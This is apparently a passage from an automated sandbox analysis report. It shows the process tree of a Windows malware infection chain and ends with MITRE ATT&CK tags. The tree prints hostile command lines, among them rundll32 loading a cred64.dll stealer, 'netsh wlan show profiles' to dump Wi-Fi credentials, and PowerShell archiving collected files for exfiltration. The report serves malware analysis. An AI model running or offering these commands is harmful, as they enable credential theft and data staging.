            PID:2160
          C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GDouWbq38shiSdxpGPfHUTkD.exe
            cmd: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GDouWbq38shiSdxpGPfHUTkD.exe" --version
            - Executes dropped EXE
            - Loads dropped DLL
            PID:4208
          C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe
            cmd: "C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1708 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240331135733" --session-guid=251e7301-27ee-4f20-b210-7ab6ee4a210c --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=9805000000000000
            - Executes dropped EXE
            - Loads dropped DLL
            - Enumerates connected drives
            PID:4224
            C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe
              cmd: C:\Users\Admin\Pictures\GDouWbq38shiSdxpGPfHUTkD.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6aebe1d0,0x6aebe1dc,0x6aebe1e8
              - Executes dropped EXE
              - Loads dropped DLL
              PID:5112
          C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
            cmd: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
            PID:2796
          C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\assistant_installer.exe
            cmd: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\assistant_installer.exe" --version
            PID:3556
            C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\assistant_installer.exe
              cmd: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x5c0040,0x5c004c,0x5c0058
              PID:5664
        C:\Users\Admin\Pictures\nFx0jXvqtWhfmyYa87QxI4QU.exe
          cmd: "C:\Users\Admin\Pictures\nFx0jXvqtWhfmyYa87QxI4QU.exe"
          PID:5928
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        PID:4616
  C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:572
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      - Suspicious behavior: EnumeratesProcesses
      PID:3088
    C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 572 -s 896
      - Program crash
      PID:5028
  C:\Windows\SysWOW64\rundll32.exe
    cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
    PID:3808
    C:\Windows\system32\rundll32.exe
      cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
      PID:6080
      C:\Windows\system32\netsh.exe
        cmd: netsh wlan show profiles
        PID:1096
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\594324687199_Desktop.zip' -CompressionLevel Optimal
        PID:6116
  C:\Windows\SysWOW64\rundll32.exe
    cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
    PID:5400
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 572 -ip 572
  PID:3228
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2432 -ip 2432
  PID:3380
C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
  PID:5920
C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
  PID:5940
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
  PID:2824
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1688 -ip 1688
  PID:5388
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
  PID:4744
C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k smphost
  PID:3144
C:\Windows\windefender.exe
  cmd: C:\Windows\windefender.exe
  PID:3180
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (1)
  - Disable or Modify System Firewall (1)
- Modify Registry (2)
- Subvert Trust Controls (1)
  - Install Root Certificate (1)
- Virtualization/Sandbox Evasion (2)
Credential Access
- Unsecured Credentials (6)
  - Credentials In Files (5)
  - Credentials in Registry (1)
Downloads